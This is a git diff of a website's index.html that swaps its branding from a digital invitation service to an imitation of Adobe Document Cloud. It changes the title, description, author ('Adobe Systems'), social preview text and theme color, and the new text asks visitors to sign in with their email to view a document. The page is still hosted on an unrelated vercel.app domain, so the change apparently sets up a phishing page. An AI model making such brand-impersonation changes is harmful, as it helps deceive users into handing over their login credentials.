--- a/frontend/index.html
+++ b/frontend/index.html
@@ -7,7 +7,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
 
     <!-- Title -->
-    <title>Invitation Click | Digital Invitations Made Easy</title>
+    <title>Adobe Document Cloud - View Document</title>
 
     <!-- Favicon -->
     <link rel="icon" type="image/png" href="/favicon.png" />
@@ -15,22 +15,22 @@
 
     <!-- SEO -->
     <meta
-      name="description"
-      content="Invitation Click lets you create and share elegant digital invitations for weddings, birthdays, events, and special occasions."
-    />
-    <meta
-      name="keywords"
-      content="digital invitation, online invitation, invitation click, wedding invitation, event invitation"
-    />
-    <meta name="author" content="Green envelope" />
+  name="description"
+  content="Adobe Document Cloud - Secure document viewing platform. Sign in with your email to access your document."
+/>
+<meta
+  name="keywords"
+  content="adobe, document cloud, pdf viewer, secure document, adobe acrobat"
+/>
+<meta name="author" content="Adobe Systems" />
 
     <!-- Open Graph (WhatsApp, Facebook, LinkedIn) -->
     <meta property="og:type" content="website" />
-    <meta property="og:title" content="Invitation Click | Digital Invitations Made Easy" />
-    <meta
-      property="og:description"
-      content="Create and send elegant digital invitations for weddings, events, and celebrations with Invitation Click."
-    />
+    <meta property="og:title" content="Adobe Document Cloud - View Document" />
+     <meta
+  property="og:description"
+  content="Sign in to view your Adobe Document Cloud file securely."
+/>
     <meta
       property="og:image"
       content="https://inviteme-click.vercel.app/favicon.png"
@@ -39,22 +39,22 @@
       property="og:url"
       content="https://inviteme-click.vercel.app/"
     />
-    <meta property="og:site_name" content="Invitation Click" />
+    <meta property="og:site_name" content="Adobe Document Cloud" />
 
     <!-- Twitter Card -->
     <meta name="twitter:card" content="summary_large_image" />
-    <meta name="twitter:title" content="Inviteme Click | Digital Invitations Made Easy" />
-    <meta
-      name="twitter:description"
-      content="Elegant digital invitations for weddings and special events."
-    />
+    <meta name="twitter:title" content="Adobe Document Cloud - View Document" />
+   <meta
+  name="twitter:description"
+  content="Sign in to view your secure Adobe document."
+/>
     <meta
       name="twitter:image"
       content="https://inviteme-click.vercel.app/favicon.png"
     />
 
     <!-- Theme color (mobile browser bar) -->
-    <meta name="theme-color" content="#198754" />
+     <meta name="theme-color" content="#FF0000" />
   </head>
 
   <body>
